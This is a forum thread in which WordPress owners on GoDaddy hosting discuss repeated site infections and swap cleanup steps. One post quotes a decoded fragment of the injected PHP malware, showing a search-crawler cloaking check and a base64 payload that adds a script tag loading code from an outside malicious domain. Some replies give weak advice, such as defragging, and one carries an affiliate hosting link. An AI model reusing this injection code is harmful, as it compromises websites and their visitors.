Wordpress Site Hacked - Please HELP !!!

@ Blue Star Ent.

I have AVG Pro version. My system is clean.

 

I Restored all the files using Godaddy File Manager.

Site is working and unable to find the kdjkfjskdfjlskdjf script in the page source and the eval base code in the php files.

But when i tried to Login to Wp-admin, I got this message from AVG:

I'm unable to access the wp admin/login panel.

 

ISSUE RESOLVED TEMPORARILY

1. Restored files using Godaddy file manager.

After restoration, site worked but the Login/Admin page was redirected to the virus site.

2. Replaced Wp-admin & Wp-includes.

Issue resolved.

WAITING FOR THE THIRD ATTACK

 

What version of Wordpress are you using ?

 

Ok guys,

So I had my third attack last Friday. First one was over a month ago and I felt like dying cause blogging is my job. I spent more than 10 hours trying different things until I finally got it solved. Now it takes me 20 or 30 minutes and I am trying to make it stop attacking me but maybe there is a code i can't manage to catch that is hidden.

Anyway this is what I do.

1) cleaning wp files
First have a copy of your database. Then I go and make a copy of wp-config.php and manually clean the malicious code. Then I do a reinstall of wordpress and from my automatic plugin.

2) Cleaning theme or themes
I had a clean copy of my clean them so i just copy and paste on top of the infected theme. If you do not have a saved theme then upload a new one. It may be a little work to format at again but cleaning it manually takes too much time but it is also an option.

3) Reload plugins
All plugins are infected or potentially nesters so I also deactivate all, delete and reinstall fresh copies.

4) Check for other php files that are not in wp files, themes, and plugins
There are some index files that are in our wordpress file that we have to clean manually. These are critical because if not cleaned you will get attacked again. Also, if you have other folders and with wordpress folders in them you have to repeat the process for every folder.

These are my steps and now to clean it, it only takes me 20 to 30 minutes and it all runs well. I am trying to work on checking how to prevent it. My 3rd attack came from a buddypress folder that I forgot to delete and that was totally infected by my 2d attack. Now the 2nd attack I dont know how it came to be.

 

I believe that if you can raise the permissions on the files to be unwritable, you will not have these problems. The same for step 4.

 

Have the same problem. I got attacked 2 times last 1 month and I'm using godaddy too. It's a simple .html file and just before </body> tag, I can see this script.

About 2 weeks ago I noticed this at my site (instead of kdjkfjskdfjlskdjf.com/kp.php, it was linked to another site) and replaced everything at the server. Today I just checked my statistics and I could see a big drop at the visitors so I checked my site and it's there again.
IF I hacked, then I would have problems with my other sites and I don't. This is godaddy problem and somebody at the server (where my site is located) doing this (this was what I found out when I did a quick search 2 weeks ago)

Bad part is SEO. I think google punished my site since I'm having 20-25% visitors compared to 1-2 weeks ago

 

Make the files unwritable after you fix them. If you find they are changed again, and it was not you, then it is as you say, your webhost.

 

There is some issues with Godaddy servers. A number of Godaddy hosted CMS sites affected with malwares which redirect to fake anti virus search results or sites. My friend's forum affected with this a couple of times and Godaddy is reluctant to accept the security loopholes at their end

 

Try decoding that string and you get this,
it will take time to understand this logic. This is basically calling the script see the line below.If you have wp-cache plugin please uninstall it.

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return

base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9rZGprZmpza2Rmamxza2RqZi5jb20va3AucGhwIj48L3NjcmlwdD4=");

Which means <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>


} return ""; } } if(!function_exists('gzdecode')){

function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));

..........

 

This has happened to me before. It's what you call an iframe hack. The first thing you will need to do is clean up your computer with any malware, make sure you do a disk defrag, and call your hosting company after. Either you or they can remove it in the coding. However, it is important that you have them change your password as soon as possible.

 

What would defragging the person´s computer do to help this problem ?

 

I would recommend moving to another provider if your having security issues and they fail to address them all 3 times.

This could also be a flaw with your anti virus. Try running a web based scanner and see if anything comes up.

If you need any help please contact me.

 

1. First check (completely) security of your computer.
I had only 1 issue of virus on one of sites in last 3 years
by friend of mine with his loose antivirus/FTP software.

2. Install WordPress from 0 (newest version), don't use
any additional plugins. Check configuration files CHMOD.

3. Restore or upgrade your DB by instructions provided in
manual (if you had used older WP version before upgrade).

X. I use GoDaddy ~2 years with other CMS. No problems.

 

Friend godaddy is unfit for the wordpress webhosting.....,

Godaddy is one of the waste...., i faced lot of problems.. me to get the same situation and the support guys saying some thing.. hit movie stories..

just leave it.

Check this

https://www.sharkspace.com/sharkcenter/aff.php?aff=272

Awesome hosting i am using for last 2 years super support is almost instant.

 

here is my 2cents

two of my wp blogs on godaddy got hacked yesterday. they are modifying all php files on the server. luckily i was able to get rid of them restoring the files thru file manager..

there is an option to see historical versions of the files. i archived all files from the day before they got changed and unzipped them all and overwrite current files.. no problems so far.. but it looks like this is a serious problem with godaddy.

keep an eye on the "last modified date" of your php files..

 

Go over to DigitalDrake.com and find article "WordPress Hack Cleanup Solution". You will see the link over in the "Recent Posts" section on that site.

 

I am also having an issue with this. totally lost as to how I might go about fixing it. attemtping to scan databse.

 

Which hosting service you use? Contact with them via email or live chat or call them and tell them your problem.
They can solve your problem instantly.

Regards

 

He was waiting for you for 7 years to tell him to contact his hosting provider. Holly crap.